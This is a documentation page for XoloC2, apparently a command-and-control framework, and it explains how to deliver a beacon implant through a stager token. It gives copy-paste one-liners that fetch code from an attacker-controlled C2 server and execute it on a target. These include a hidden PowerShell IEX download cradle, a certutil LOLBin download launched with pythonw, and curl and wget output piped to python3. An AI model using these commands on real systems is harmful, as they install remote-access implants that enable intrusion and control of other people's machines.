Skip to content
XoloC2

Stager Delivery

Stager Delivery

Section titled “Stager Delivery”

The stager lets you deliver a beacon via a single one-liner without copying files manually. The payload is AES-256-CBC encrypted and only decryptable with the key embedded in the one-liner.

Step 1 — Generate a beacon

Section titled “Step 1 — Generate a beacon”

First create a beacon from Generate Beacon. Download the source .py, .ps1, or .jar file.

Step 2 — Create a stager token

Section titled “Step 2 — Create a stager token”

Go to Stager in the sidebar:

  1. Paste the beacon source code
  2. Set Max uses (e.g. 1 for single-use)
  3. Set an Expiry time
  4. Click Create

A token URL is generated along with all delivery one-liners.

Step 3 — Deliver to target

Section titled “Step 3 — Deliver to target”

Pick the one-liner that fits your scenario:

Windows — PowerShell (in-memory):

Terminal window
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://your-c2:8443/s/TOKEN?k=KEY')"

Windows — certutil (LOLBin):

Terminal window
certutil -urlcache -split -f https://your-c2:8443/s/TOKEN?k=KEY %TEMP%\b.py && pythonw %TEMP%\b.py

Linux — curl:

Terminal window
curl -sk 'https://your-c2:8443/s/TOKEN?k=KEY' | python3

Linux — wget:

Terminal window
wget -qO- 'https://your-c2:8443/s/TOKEN?k=KEY' | python3

All one-liners are shown pre-filled in the panel — just copy and paste.

Step 4 — Revoke the token

Section titled “Step 4 — Revoke the token”

After use, go to Stager and click Revoke next to the token to invalidate it immediately.